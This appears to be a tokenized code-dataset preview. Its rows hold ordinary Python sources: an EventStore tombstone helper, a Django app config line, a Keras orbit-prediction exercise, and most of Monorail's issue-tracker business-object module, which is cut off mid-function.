content stringlengths 1 1.04M | input_ids listlengths 1 774k | ratio_char_token float64 0.38 22.9 | token_count int64 1 774k |
|---|---|---|---|
"""
Tombstone stream.
"""
from typing import Union
from eventstore_grpc.proto import streams_pb2, streams_pb2_grpc, shared_pb2
from eventstore_grpc import constants
def tombstone_stream(
stub: streams_pb2_grpc.StreamsStub,
stream: str,
expected_version: Union[int, str],
**kwargs,
):
"""Tombstone."""
request = streams_pb2.TombstoneReq()
options = streams_pb2.TombstoneReq.Options()
expected_stream_revision = None
if expected_version == constants.ANY:
options.any.CopyFrom(shared_pb2.Empty())
elif expected_version == constants.NO_STREAM:
options.no_stream.CopyFrom(shared_pb2.Empty())
elif expected_version == constants.STREAM_EXISTS:
options.stream_exists.CopyFrom(shared_pb2.Empty())
request.options.CopyFrom(options)
response = stub.Tombstone(request, **kwargs)
return response
| [
37811,
198,
51,
2381,
6440,
4269,
13,
198,
37811,
198,
198,
6738,
19720,
1330,
4479,
198,
6738,
1785,
8095,
62,
2164,
14751,
13,
1676,
1462,
1330,
15190,
62,
40842,
17,
11,
15190,
62,
40842,
17,
62,
2164,
14751,
11,
4888,
62,
40842,
... | 2.648318 | 327 |
from django.apps import AppConfig
| [
6738,
42625,
14208,
13,
18211,
1330,
2034,
16934,
628
] | 3.888889 | 9 |
# Predicting the orbit trajectory
# Function created to plot the output
# Build model
# Instantiate a Sequential model
model = Sequential()
# Add a Dense layer with 50 neurons and an input of 1 neuron
model.add(Dense(50, input_shape=(1,), activation='relu'))
# Add two Dense layers with 50 neurons and relu activation
model.add(Dense(50,activation='relu'))
model.add(Dense(50,activation='relu'))
# End your model with a Dense layer and no activation
model.add(Dense(1))
# Compile your model
model.compile(optimizer = 'adam', loss = 'mse')
print("Training started..., this can take a while:")
# Fit your model on your data for 30 epochs
model.fit(time_steps,y_positions, epochs = 30)
# Evaluate your model
print("Final loss value:",model.evaluate(time_steps, y_positions))
# Predict the twenty minutes orbit
twenty_min_orbit = model.predict(np.arange(-10, 11))
# Plot the twenty minute orbit
plot_orbit(twenty_min_orbit)
# Predict the eighty minute orbit. Model works well using the same time period to perform predictions on tat the model was built on.
# However, with the introduction of additional time period's to test model predictions on the model begins to struggle. This makes
# sense as the model can only work with the data that has been input to build predictions.
eighty_min_orbit = model.predict(np.arange(-40, 41))
# Plot the eighty minute orbit
plot_orbit(eighty_min_orbit)
| [
2,
49461,
278,
262,
13066,
22942,
198,
198,
2,
15553,
2727,
284,
7110,
262,
5072,
198,
198,
2,
10934,
2746,
198,
2,
24470,
9386,
257,
24604,
1843,
2746,
198,
19849,
796,
24604,
1843,
3419,
198,
198,
2,
3060,
257,
360,
1072,
7679,
35... | 3.369305 | 417 |
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
"""Business objects for the Monorail issue tracker.
These are classes and functions that operate on the objects that
users care about in the issue tracker: e.g., issues, and the issue
tracker configuration.
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import collections
import logging
import time
from six import string_types
from features import federated
from framework import exceptions
from framework import framework_bizobj
from framework import framework_constants
from framework import framework_helpers
from framework import timestr
from framework import urls
from proto import tracker_pb2
from tracker import tracker_constants
def GetOwnerId(issue):
"""Get the owner of an issue, whether it is explicit or derived."""
return (issue.owner_id or issue.derived_owner_id or
framework_constants.NO_USER_SPECIFIED)
def GetStatus(issue):
"""Get the status of an issue, whether it is explicit or derived."""
return issue.status or issue.derived_status or ''
def GetCcIds(issue):
"""Get the Cc's of an issue, whether they are explicit or derived."""
return issue.cc_ids + issue.derived_cc_ids
def GetApproverIds(issue):
"""Get the Approvers' ids of an isuses approval_values."""
approver_ids = []
for av in issue.approval_values:
approver_ids.extend(av.approver_ids)
return list(set(approver_ids))
def GetLabels(issue):
"""Get the labels of an issue, whether explicit or derived."""
return issue.labels + issue.derived_labels
def MakeProjectIssueConfig(
project_id, well_known_statuses, statuses_offer_merge, well_known_labels,
excl_label_prefixes, col_spec):
"""Return a ProjectIssueConfig with the given values."""
# pylint: disable=multiple-statements
if not well_known_statuses: well_known_statuses = []
if not statuses_offer_merge: statuses_offer_merge = []
if not well_known_labels: well_known_labels = []
if not excl_label_prefixes: excl_label_prefixes = []
if not col_spec: col_spec = ' '
project_config = tracker_pb2.ProjectIssueConfig()
if project_id: # There is no ID for harmonized configs.
project_config.project_id = project_id
SetConfigStatuses(project_config, well_known_statuses)
project_config.statuses_offer_merge = statuses_offer_merge
SetConfigLabels(project_config, well_known_labels)
project_config.exclusive_label_prefixes = excl_label_prefixes
# ID 0 means that nothing has been specified, so use hard-coded defaults.
project_config.default_template_for_developers = 0
project_config.default_template_for_users = 0
project_config.default_col_spec = col_spec
# Note: default project issue config has no filter rules.
return project_config
def FindFieldDef(field_name, config):
"""Find the specified field, or return None."""
if not field_name:
return None
field_name_lower = field_name.lower()
for fd in config.field_defs:
if fd.field_name.lower() == field_name_lower:
return fd
return None
def FindFieldDefByID(field_id, config):
"""Find the specified field, or return None."""
for fd in config.field_defs:
if fd.field_id == field_id:
return fd
return None
def FindApprovalDef(approval_name, config):
"""Find the specified approval, or return None."""
fd = FindFieldDef(approval_name, config)
if fd:
return FindApprovalDefByID(fd.field_id, config)
return None
def FindApprovalDefByID(approval_id, config):
"""Find the specified approval, or return None."""
for approval_def in config.approval_defs:
if approval_def.approval_id == approval_id:
return approval_def
return None
def FindApprovalValueByID(approval_id, approval_values):
"""Find the specified approval_value in the given list or return None."""
for av in approval_values:
if av.approval_id == approval_id:
return av
return None
def FindApprovalsSubfields(approval_ids, config):
"""Return a dict of {approval_ids: approval_subfields}."""
approval_subfields_dict = collections.defaultdict(list)
for fd in config.field_defs:
if fd.approval_id in approval_ids:
approval_subfields_dict[fd.approval_id].append(fd)
return approval_subfields_dict
def FindPhaseByID(phase_id, phases):
"""Find the specified phase, or return None"""
for phase in phases:
if phase.phase_id == phase_id:
return phase
return None
def FindPhase(name, phases):
"""Find the specified phase, or return None"""
for phase in phases:
if phase.name.lower() == name.lower():
return phase
return None
def GetGrantedPerms(issue, effective_ids, config):
"""Return a set of permissions granted by user-valued fields in an issue."""
granted_perms = set()
for field_value in issue.field_values:
if field_value.user_id in effective_ids:
field_def = FindFieldDefByID(field_value.field_id, config)
if field_def and field_def.grants_perm:
# TODO(jrobbins): allow comma-separated list in grants_perm
granted_perms.add(field_def.grants_perm.lower())
return granted_perms
def LabelsByPrefix(labels, lower_field_names):
"""Convert a list of key-value labels into {lower_prefix: [value, ...]}.
It also handles custom fields with dashes in the field name.
"""
label_values_by_prefix = collections.defaultdict(list)
for lab in labels:
if '-' not in lab:
continue
lower_lab = lab.lower()
for lower_field_name in lower_field_names:
if lower_lab.startswith(lower_field_name + '-'):
prefix = lower_field_name
value = lab[len(lower_field_name)+1:]
break
else: # No field name matched
prefix, value = lab.split('-', 1)
prefix = prefix.lower()
label_values_by_prefix[prefix].append(value)
return label_values_by_prefix
def LabelIsMaskedByField(label, field_names):
"""If the label should be displayed as a field, return the field name.
Args:
label: string label to consider.
field_names: a list of field names in lowercase.
Returns:
If masked, return the lowercase name of the field, otherwise None. A label
is masked by a custom field if the field name "Foo" matches the key part of
a key-value label "Foo-Bar".
"""
if '-' not in label:
return None
for field_name_lower in field_names:
if label.lower().startswith(field_name_lower + '-'):
return field_name_lower
return None
def NonMaskedLabels(labels, field_names):
"""Return only those labels that are not masked by custom fields."""
return [lab for lab in labels
if not LabelIsMaskedByField(lab, field_names)]
def ExplicitAndDerivedNonMaskedLabels(labels, derived_labels, config):
"""Return two lists of labels that are not masked by enum custom fields."""
field_names = [fd.field_name.lower() for fd in config.field_defs
if fd.field_type is tracker_pb2.FieldTypes.ENUM_TYPE and
not fd.is_deleted] # TODO(jrobbins): restricts
labels = [
lab for lab in labels
if not LabelIsMaskedByField(lab, field_names)]
derived_labels = [
lab for lab in derived_labels
if not LabelIsMaskedByField(lab, field_names)]
return labels, derived_labels
def MakeApprovalValue(approval_id, approver_ids=None, status=None,
setter_id=None, set_on=None, phase_id=None):
"""Return an ApprovalValue PB with the given field values."""
av = tracker_pb2.ApprovalValue(
approval_id=approval_id, status=status,
setter_id=setter_id, set_on=set_on, phase_id=phase_id)
if approver_ids is not None:
av.approver_ids = approver_ids
return av
def MakeFieldDef(
field_id,
project_id,
field_name,
field_type_int,
applic_type,
applic_pred,
is_required,
is_niche,
is_multivalued,
min_value,
max_value,
regex,
needs_member,
needs_perm,
grants_perm,
notify_on,
date_action,
docstring,
is_deleted,
approval_id=None,
is_phase_field=False,
is_restricted_field=False,
admin_ids=None,
editor_ids=None):
"""Make a FieldDef PB for the given FieldDef table row tuple."""
if isinstance(date_action, string_types):
date_action = date_action.upper()
fd = tracker_pb2.FieldDef(
field_id=field_id,
project_id=project_id,
field_name=field_name,
field_type=field_type_int,
is_required=bool(is_required),
is_niche=bool(is_niche),
is_multivalued=bool(is_multivalued),
docstring=docstring,
is_deleted=bool(is_deleted),
applicable_type=applic_type or '',
applicable_predicate=applic_pred or '',
needs_member=bool(needs_member),
grants_perm=grants_perm or '',
notify_on=tracker_pb2.NotifyTriggers(notify_on or 0),
date_action=tracker_pb2.DateAction(date_action or 0),
is_phase_field=bool(is_phase_field),
is_restricted_field=bool(is_restricted_field))
if min_value is not None:
fd.min_value = min_value
if max_value is not None:
fd.max_value = max_value
if regex is not None:
fd.regex = regex
if needs_perm is not None:
fd.needs_perm = needs_perm
if approval_id is not None:
fd.approval_id = approval_id
if admin_ids:
fd.admin_ids = admin_ids
if editor_ids:
fd.editor_ids = editor_ids
return fd
def MakeFieldValue(
field_id, int_value, str_value, user_id, date_value, url_value, derived,
phase_id=None):
"""Make a FieldValue based on the given information."""
fv = tracker_pb2.FieldValue(field_id=field_id, derived=derived)
if phase_id is not None:
fv.phase_id = phase_id
if int_value is not None:
fv.int_value = int_value
elif str_value is not None:
fv.str_value = str_value
elif user_id is not None:
fv.user_id = user_id
elif date_value is not None:
fv.date_value = date_value
elif url_value is not None:
fv.url_value = url_value
else:
raise ValueError('Unexpected field value')
return fv
def GetFieldValueWithRawValue(field_type, field_value, users_by_id, raw_value):
"""Find and return the field value of the specified field type.
If the specified field_value is None or is empty then the raw_value is
returned. When the field type is USER_TYPE the raw_value is used as a key to
lookup users_by_id.
Args:
field_type: tracker_pb2.FieldTypes type.
field_value: tracker_pb2.FieldValue type.
users_by_id: Dict mapping user_ids to UserViews.
raw_value: String to use if field_value is not specified.
Returns:
Value of the specified field type.
"""
ret_value = GetFieldValue(field_value, users_by_id)
if ret_value:
return ret_value
# Special case for user types.
if field_type == tracker_pb2.FieldTypes.USER_TYPE:
if raw_value in users_by_id:
return users_by_id[raw_value].email
return raw_value
def GetFieldValue(fv, users_by_id):
"""Return the value of this field. Give emails for users in users_by_id."""
if fv is None:
return None
elif fv.int_value is not None:
return fv.int_value
elif fv.str_value is not None:
return fv.str_value
elif fv.user_id is not None:
if fv.user_id in users_by_id:
return users_by_id[fv.user_id].email
else:
logging.info('Failed to lookup user %d when getting field', fv.user_id)
return fv.user_id
elif fv.date_value is not None:
return timestr.TimestampToDateWidgetStr(fv.date_value)
elif fv.url_value is not None:
return fv.url_value
else:
return None
def FindComponentDef(path, config):
"""Find the specified component, or return None."""
path_lower = path.lower()
for cd in config.component_defs:
if cd.path.lower() == path_lower:
return cd
return None
def FindMatchingComponentIDs(path, config, exact=True):
"""Return a list of components that match the given path."""
component_ids = []
path_lower = path.lower()
if exact:
for cd in config.component_defs:
if cd.path.lower() == path_lower:
component_ids.append(cd.component_id)
else:
path_lower_delim = path.lower() + '>'
for cd in config.component_defs:
target_delim = cd.path.lower() + '>'
if target_delim.startswith(path_lower_delim):
component_ids.append(cd.component_id)
return component_ids
def FindComponentDefByID(component_id, config):
"""Find the specified component, or return None."""
for cd in config.component_defs:
if cd.component_id == component_id:
return cd
return None
def FindAncestorComponents(config, component_def):
"""Return a list of all components the given component is under."""
path_lower = component_def.path.lower()
return [cd for cd in config.component_defs
if path_lower.startswith(cd.path.lower() + '>')]
def GetIssueComponentsAndAncestors(issue, config):
"""Return a list of all the components that an issue is in."""
result = set()
for component_id in issue.component_ids:
cd = FindComponentDefByID(component_id, config)
if cd is None:
logging.error('Tried to look up non-existent component %r' % component_id)
continue
ancestors = FindAncestorComponents(config, cd)
result.add(cd)
result.update(ancestors)
return sorted(result, key=lambda cd: cd.path)
def FindDescendantComponents(config, component_def):
"""Return a list of all nested components under the given component."""
path_plus_delim = component_def.path.lower() + '>'
return [cd for cd in config.component_defs
if cd.path.lower().startswith(path_plus_delim)]
def MakeComponentDef(
component_id, project_id, path, docstring, deprecated, admin_ids, cc_ids,
created, creator_id, modified=None, modifier_id=None, label_ids=None):
"""Make a ComponentDef PB for the given FieldDef table row tuple."""
cd = tracker_pb2.ComponentDef(
component_id=component_id, project_id=project_id, path=path,
docstring=docstring, deprecated=bool(deprecated),
admin_ids=admin_ids, cc_ids=cc_ids, created=created,
creator_id=creator_id, modified=modified, modifier_id=modifier_id,
label_ids=label_ids or [])
return cd
def MakeSavedQuery(
query_id, name, base_query_id, query, subscription_mode=None,
executes_in_project_ids=None):
"""Make SavedQuery PB for the given info."""
saved_query = tracker_pb2.SavedQuery(
name=name, base_query_id=base_query_id, query=query)
if query_id is not None:
saved_query.query_id = query_id
if subscription_mode is not None:
saved_query.subscription_mode = subscription_mode
if executes_in_project_ids is not None:
saved_query.executes_in_project_ids = executes_in_project_ids
return saved_query
def SetConfigStatuses(project_config, well_known_statuses):
"""Internal method to set the well-known statuses of ProjectIssueConfig."""
project_config.well_known_statuses = []
for status, docstring, means_open, deprecated in well_known_statuses:
canonical_status = framework_bizobj.CanonicalizeLabel(status)
project_config.well_known_statuses.append(tracker_pb2.StatusDef(
status_docstring=docstring, status=canonical_status,
means_open=means_open, deprecated=deprecated))
def SetConfigLabels(project_config, well_known_labels):
"""Internal method to set the well-known labels of a ProjectIssueConfig."""
project_config.well_known_labels = []
for label, docstring, deprecated in well_known_labels:
canonical_label = framework_bizobj.CanonicalizeLabel(label)
project_config.well_known_labels.append(tracker_pb2.LabelDef(
label=canonical_label, label_docstring=docstring,
deprecated=deprecated))
def SetConfigApprovals(project_config, approval_def_tuples):
"""Internal method to set up approval defs of a ProjectissueConfig."""
project_config.approval_defs = []
for approval_id, approver_ids, survey in approval_def_tuples:
project_config.approval_defs.append(tracker_pb2.ApprovalDef(
approval_id=approval_id, approver_ids=approver_ids, survey=survey))
def ConvertDictToTemplate(template_dict):
"""Construct a Template PB with the values from template_dict.
Args:
template_dict: dictionary with fields corresponding to the Template
PB fields.
Returns:
A Template protocol buffer that can be stored in the
project's ProjectIssueConfig PB.
"""
return MakeIssueTemplate(
template_dict.get('name'), template_dict.get('summary'),
template_dict.get('status'), template_dict.get('owner_id'),
template_dict.get('content'), template_dict.get('labels'), [], [],
template_dict.get('components'),
summary_must_be_edited=template_dict.get('summary_must_be_edited'),
owner_defaults_to_member=template_dict.get('owner_defaults_to_member'),
component_required=template_dict.get('component_required'),
members_only=template_dict.get('members_only'))
def MakeIssueTemplate(
name,
summary,
status,
owner_id,
content,
labels,
field_values,
admin_ids,
component_ids,
summary_must_be_edited=None,
owner_defaults_to_member=None,
component_required=None,
members_only=None,
phases=None,
approval_values=None):
"""Make an issue template PB."""
template = tracker_pb2.TemplateDef()
template.name = name
if summary:
template.summary = summary
if status:
template.status = status
if owner_id:
template.owner_id = owner_id
template.content = content
template.field_values = field_values
template.labels = labels or []
template.admin_ids = admin_ids
template.component_ids = component_ids or []
template.approval_values = approval_values or []
if summary_must_be_edited is not None:
template.summary_must_be_edited = summary_must_be_edited
if owner_defaults_to_member is not None:
template.owner_defaults_to_member = owner_defaults_to_member
if component_required is not None:
template.component_required = component_required
if members_only is not None:
template.members_only = members_only
if phases is not None:
template.phases = phases
return template
def MakeDefaultProjectIssueConfig(project_id):
"""Return a ProjectIssueConfig with use by projects that don't have one."""
return MakeProjectIssueConfig(
project_id,
tracker_constants.DEFAULT_WELL_KNOWN_STATUSES,
tracker_constants.DEFAULT_STATUSES_OFFER_MERGE,
tracker_constants.DEFAULT_WELL_KNOWN_LABELS,
tracker_constants.DEFAULT_EXCL_LABEL_PREFIXES,
tracker_constants.DEFAULT_COL_SPEC)
def HarmonizeConfigs(config_list):
"""Combine several ProjectIssueConfigs into one for cross-project sorting.
Args:
config_list: a list of ProjectIssueConfig PBs with labels and statuses
among other fields.
Returns:
A new ProjectIssueConfig with just the labels and status values filled
in to be a logical union of the given configs. Specifically, the order
of the combined status and label lists should be maintained.
"""
if not config_list:
return MakeDefaultProjectIssueConfig(None)
harmonized_status_names = _CombineOrderedLists(
[[stat.status for stat in config.well_known_statuses]
for config in config_list])
harmonized_label_names = _CombineOrderedLists(
[[lab.label for lab in config.well_known_labels]
for config in config_list])
harmonized_default_sort_spec = ' '.join(
config.default_sort_spec for config in config_list)
harmonized_means_open = {
status: any([stat.means_open
for config in config_list
for stat in config.well_known_statuses
if stat.status == status])
for status in harmonized_status_names}
# This col_spec is probably not what the user wants to view because it is
# too much information. We join all the col_specs here so that we are sure
# to lookup all users needed for sorting, even if it is more than needed.
# xxx we need to look up users based on colspec rather than sortspec?
harmonized_default_col_spec = ' '.join(
config.default_col_spec for config in config_list)
result_config = tracker_pb2.ProjectIssueConfig()
# The combined config is only used during sorting, never stored.
result_config.default_col_spec = harmonized_default_col_spec
result_config.default_sort_spec = harmonized_default_sort_spec
for status_name in harmonized_status_names:
result_config.well_known_statuses.append(tracker_pb2.StatusDef(
status=status_name, means_open=harmonized_means_open[status_name]))
for label_name in harmonized_label_names:
result_config.well_known_labels.append(tracker_pb2.LabelDef(
label=label_name))
for config in config_list:
result_config.field_defs.extend(
list(fd for fd in config.field_defs if not fd.is_deleted))
result_config.component_defs.extend(config.component_defs)
result_config.approval_defs.extend(config.approval_defs)
return result_config
def HarmonizeLabelOrStatusRows(def_rows):
"""Put the given label defs into a logical global order."""
ranked_defs_by_project = {}
oddball_defs = []
for row in def_rows:
def_id, project_id, rank, label = row[0], row[1], row[2], row[3]
if rank is not None:
ranked_defs_by_project.setdefault(project_id, []).append(
(def_id, rank, label))
else:
oddball_defs.append((def_id, rank, label))
oddball_defs.sort(reverse=True, key=lambda def_tuple: def_tuple[2].lower())
# Compose the list-of-lists in a consistent order by project_id.
list_of_lists = [ranked_defs_by_project[pid]
for pid in sorted(ranked_defs_by_project.keys())]
harmonized_ranked_defs = _CombineOrderedLists(
list_of_lists, include_duplicate_keys=True,
key=lambda def_tuple: def_tuple[2])
return oddball_defs + harmonized_ranked_defs
def _CombineOrderedLists(
list_of_lists, include_duplicate_keys=False, key=lambda x: x):
"""Combine lists of items while maintaining their desired order.
Args:
list_of_lists: a list of lists of strings.
include_duplicate_keys: Pass True to make the combined list have the
same total number of elements as the sum of the input lists.
key: optional function to choose which part of the list items hold the
string used for comparison. The result will have the whole items.
Returns:
A single list of items containing one copy of each of the items
in any of the original list, and in an order that maintains the original
list ordering as much as possible.
"""
combined_items = []
combined_keys = []
seen_keys_set = set()
for one_list in list_of_lists:
_AccumulateCombinedList(
one_list, combined_items, combined_keys, seen_keys_set, key=key,
include_duplicate_keys=include_duplicate_keys)
return combined_items
def _AccumulateCombinedList(
one_list, combined_items, combined_keys, seen_keys_set,
include_duplicate_keys=False, key=lambda x: x):
"""Accumulate strings into a combined list while its maintaining ordering.
Args:
one_list: list of strings in a desired order.
combined_items: accumulated list of items in the desired order.
combined_keys: accumulated list of key strings in the desired order.
seen_keys_set: set of strings that are already in combined_list.
include_duplicate_keys: Pass True to make the combined list have the
same total number of elements as the sum of the input lists.
key: optional function to choose which part of the list items hold the
string used for comparison. The result will have the whole items.
Returns:
Nothing. But, combined_items is modified to mix in all the items of
one_list at appropriate points such that nothing in combined_items
is reordered, and the ordering of items from one_list is maintained
as much as possible. Also, seen_keys_set is modified to add any keys
for items that were added to combined_items.
Also, any strings that begin with "#" are compared regardless of the "#".
The purpose of such strings is to guide the final ordering.
"""
insert_idx = 0
for item in one_list:
s = key(item).lower()
if s in seen_keys_set:
item_idx = combined_keys.index(s) # Need parallel list of keys
insert_idx = max(insert_idx, item_idx + 1)
if s not in seen_keys_set or include_duplicate_keys:
combined_items.insert(insert_idx, item)
combined_keys.insert(insert_idx, s)
insert_idx += 1
seen_keys_set.add(s)
def GetBuiltInQuery(query_id):
"""If the given query ID is for a built-in query, return that string."""
return tracker_constants.DEFAULT_CANNED_QUERY_CONDS.get(query_id, '')
def UsersInvolvedInAmendments(amendments):
"""Return a set of all user IDs mentioned in the given Amendments."""
user_id_set = set()
for amendment in amendments:
user_id_set.update(amendment.added_user_ids)
user_id_set.update(amendment.removed_user_ids)
return user_id_set
def _AccumulateUsersInvolvedInComment(comment, user_id_set):
"""Build up a set of all users involved in an IssueComment.
Args:
comment: an IssueComment PB.
user_id_set: a set of user IDs to build up.
Returns:
The same set, but modified to have the user IDs of user who
entered the comment, and all the users mentioned in any amendments.
"""
user_id_set.add(comment.user_id)
user_id_set.update(UsersInvolvedInAmendments(comment.amendments))
return user_id_set
def UsersInvolvedInComment(comment):
"""Return a set of all users involved in an IssueComment.
Args:
comment: an IssueComment PB.
Returns:
A set with the user IDs of user who entered the comment, and all the
users mentioned in any amendments.
"""
return _AccumulateUsersInvolvedInComment(comment, set())
def UsersInvolvedInCommentList(comments):
"""Return a set of all users involved in a list of IssueComments.
Args:
comments: a list of IssueComment PBs.
Returns:
A set with the user IDs of user who entered the comment, and all the
users mentioned in any amendments.
"""
result = set()
for c in comments:
_AccumulateUsersInvolvedInComment(c, result)
return result
def UsersInvolvedInIssues(issues):
"""Return a set of all user IDs referenced in the issues' metadata."""
result = set()
for issue in issues:
result.update([issue.reporter_id, issue.owner_id, issue.derived_owner_id])
result.update(issue.cc_ids)
result.update(issue.derived_cc_ids)
result.update(fv.user_id for fv in issue.field_values if fv.user_id)
for av in issue.approval_values:
result.update(approver_id for approver_id in av.approver_ids)
if av.setter_id:
result.update([av.setter_id])
return result
def UsersInvolvedInTemplate(template):
"""Return a set of all user IDs referenced in the template."""
result = set(
template.admin_ids +
[fv.user_id for fv in template.field_values if fv.user_id])
if template.owner_id:
result.add(template.owner_id)
for av in template.approval_values:
result.update(set(av.approver_ids))
if av.setter_id:
result.add(av.setter_id)
return result
def UsersInvolvedInTemplates(templates):
"""Return a set of all user IDs referenced in the given templates."""
result = set()
for template in templates:
result.update(UsersInvolvedInTemplate(template))
return result
def UsersInvolvedInComponents(component_defs):
"""Return a set of user IDs referenced in the given components."""
result = set()
for cd in component_defs:
result.update(cd.admin_ids)
result.update(cd.cc_ids)
if cd.creator_id:
result.add(cd.creator_id)
if cd.modifier_id:
result.add(cd.modifier_id)
return result
def UsersInvolvedInApprovalDefs(approval_defs, matching_fds):
# type: (Sequence[proto.tracker_pb2.ApprovalDef],
# Sequence[proto.tracker_pb2.FieldDef]) -> Collection[int]
"""Return a set of user IDs referenced in the approval_defs and field defs"""
result = set()
for ad in approval_defs:
result.update(ad.approver_ids)
for fd in matching_fds:
result.update(fd.admin_ids)
return result
def UsersInvolvedInConfig(config):
"""Return a set of all user IDs referenced in the config."""
result = set()
for ad in config.approval_defs:
result.update(ad.approver_ids)
for fd in config.field_defs:
result.update(fd.admin_ids)
result.update(UsersInvolvedInComponents(config.component_defs))
return result
def LabelIDsInvolvedInConfig(config):
"""Return a set of all label IDs referenced in the config."""
result = set()
for cd in config.component_defs:
result.update(cd.label_ids)
return result
def MakeIssueDelta(
status, owner_id, cc_ids_add, cc_ids_remove, comp_ids_add, comp_ids_remove,
labels_add, labels_remove, field_vals_add, field_vals_remove, fields_clear,
blocked_on_add, blocked_on_remove, blocking_add, blocking_remove,
merged_into, summary, ext_blocked_on_add=None, ext_blocked_on_remove=None,
ext_blocking_add=None, ext_blocking_remove=None, merged_into_external=None):
"""Construct an IssueDelta object with the given fields, iff non-None."""
delta = tracker_pb2.IssueDelta(
cc_ids_add=cc_ids_add, cc_ids_remove=cc_ids_remove,
comp_ids_add=comp_ids_add, comp_ids_remove=comp_ids_remove,
labels_add=labels_add, labels_remove=labels_remove,
field_vals_add=field_vals_add, field_vals_remove=field_vals_remove,
fields_clear=fields_clear,
blocked_on_add=blocked_on_add, blocked_on_remove=blocked_on_remove,
blocking_add=blocking_add, blocking_remove=blocking_remove)
if status is not None:
delta.status = status
if owner_id is not None:
delta.owner_id = owner_id
if merged_into is not None:
delta.merged_into = merged_into
if merged_into_external is not None:
delta.merged_into_external = merged_into_external
if summary is not None:
delta.summary = summary
if ext_blocked_on_add is not None:
delta.ext_blocked_on_add = ext_blocked_on_add
if ext_blocked_on_remove is not None:
delta.ext_blocked_on_remove = ext_blocked_on_remove
if ext_blocking_add is not None:
delta.ext_blocking_add = ext_blocking_add
if ext_blocking_remove is not None:
delta.ext_blocking_remove = ext_blocking_remove
return delta
def ApplyLabelChanges(issue, config, labels_add, labels_remove):
"""Updates the PB issue's labels and returns the amendment or None."""
canon_labels_add = [framework_bizobj.CanonicalizeLabel(l)
for l in labels_add]
labels_add = [l for l in canon_labels_add if l]
canon_labels_remove = [framework_bizobj.CanonicalizeLabel(l)
for l in labels_remove]
labels_remove = [l for l in canon_labels_remove if l]
(labels, update_labels_add,
update_labels_remove) = framework_bizobj.MergeLabels(
issue.labels, labels_add, labels_remove, config)
if update_labels_add or update_labels_remove:
issue.labels = labels
return MakeLabelsAmendment(
update_labels_add, update_labels_remove)
return None
def ApplyFieldValueChanges(issue, config, fvs_add, fvs_remove, fields_clear):
"""Updates the PB issue's field_values and returns an amendments list."""
phase_names_dict = {phase.phase_id: phase.name for phase in issue.phases}
phase_ids = list(phase_names_dict.keys())
(field_vals, added_fvs_by_id,
removed_fvs_by_id) = _MergeFields(
issue.field_values,
[fv for fv in fvs_add if not fv.phase_id or fv.phase_id in phase_ids],
[fv for fv in fvs_remove if not fv.phase_id or fv.phase_id in phase_ids],
config.field_defs)
amendments = []
if added_fvs_by_id or removed_fvs_by_id:
issue.field_values = field_vals
for fd in config.field_defs:
fd_added_values_by_phase = collections.defaultdict(list)
fd_removed_values_by_phase = collections.defaultdict(list)
# Split fd's added/removed fvs by the phase they belong to.
# non-phase fds will result in {None: [added_fvs]}
for fv in added_fvs_by_id.get(fd.field_id, []):
fd_added_values_by_phase[fv.phase_id].append(fv)
for fv in removed_fvs_by_id.get(fd.field_id, []):
fd_removed_values_by_phase[fv.phase_id].append(fv)
# Use all_fv_phase_ids to create Amendments, so no empty amendments
# are created for issue phases that had no field value changes.
all_fv_phase_ids = set(
fd_removed_values_by_phase.keys() + fd_added_values_by_phase.keys())
for phase_id in all_fv_phase_ids:
new_values = [GetFieldValue(fv, {}) for fv
in fd_added_values_by_phase.get(phase_id, [])]
old_values = [GetFieldValue(fv, {}) for fv
in fd_removed_values_by_phase.get(phase_id, [])]
amendments.append(MakeFieldAmendment(
fd.field_id, config, new_values, old_values=old_values,
phase_name=phase_names_dict.get(phase_id)))
# Note: Clearing fields is used with bulk-editing and phase fields do
# not appear there and cannot be bulk-edited.
if fields_clear:
field_clear_set = set(fields_clear)
revised_fields = []
for fd in config.field_defs:
if fd.field_id not in field_clear_set:
revised_fields.extend(
fv for fv in issue.field_values if fv.field_id == fd.field_id)
else:
amendments.append(
MakeFieldClearedAmendment(fd.field_id, config))
if fd.field_type == tracker_pb2.FieldTypes.ENUM_TYPE:
prefix = fd.field_name.lower() + '-'
filtered_labels = [
lab for lab in issue.labels
if not lab.lower().startswith(prefix)]
issue.labels = filtered_labels
issue.field_values = revised_fields
return amendments
def ApplyIssueDelta(cnxn, issue_service, issue, delta, config):
"""Apply an issue delta to an issue in RAM.
Args:
cnxn: connection to SQL database.
issue_service: object to access issue-related data in the database.
issue: Issue to be updated.
delta: IssueDelta object with new values for everything being changed.
config: ProjectIssueConfig object for the project containing the issue.
Returns:
A pair (amendments, impacted_iids) where amendments is a list of Amendment
protos to describe what changed, and impacted_iids is a set of other IIDs
for issues that are modified because they are related to the given issue.
"""
amendments = []
impacted_iids = set()
if (delta.status is not None and delta.status != issue.status):
status = framework_bizobj.CanonicalizeLabel(delta.status)
amendments.append(MakeStatusAmendment(status, issue.status))
issue.status = status
if (delta.owner_id is not None and delta.owner_id != issue.owner_id):
amendments.append(MakeOwnerAmendment(delta.owner_id, issue.owner_id))
issue.owner_id = delta.owner_id
# compute the set of cc'd users added and removed
cc_add = [cc for cc in delta.cc_ids_add if cc not in issue.cc_ids]
cc_remove = [cc for cc in delta.cc_ids_remove if cc in issue.cc_ids]
if cc_add or cc_remove:
cc_ids = [cc for cc in list(issue.cc_ids) + cc_add
if cc not in cc_remove]
issue.cc_ids = cc_ids
amendments.append(MakeCcAmendment(cc_add, cc_remove))
# compute the set of components added and removed
comp_ids_add = [
c for c in delta.comp_ids_add if c not in issue.component_ids]
comp_ids_remove = [
c for c in delta.comp_ids_remove if c in issue.component_ids]
if comp_ids_add or comp_ids_remove:
comp_ids = [cid for cid in list(issue.component_ids) + comp_ids_add
if cid not in comp_ids_remove]
issue.component_ids = comp_ids
amendments.append(MakeComponentsAmendment(
comp_ids_add, comp_ids_remove, config))
# compute the set of labels added and removed
label_amendment = ApplyLabelChanges(
issue, config, delta.labels_add, delta.labels_remove)
if label_amendment:
amendments.append(label_amendment)
# compute the set of custom fields added and removed
fv_amendments = ApplyFieldValueChanges(
issue, config, delta.field_vals_add, delta.field_vals_remove,
delta.fields_clear)
amendments.extend(fv_amendments)
# Update blocking and blocked on issues.
(block_changes_amendments,
block_changes_impacted_iids) = ApplyIssueBlockRelationChanges(
cnxn, issue, delta.blocked_on_add, delta.blocked_on_remove,
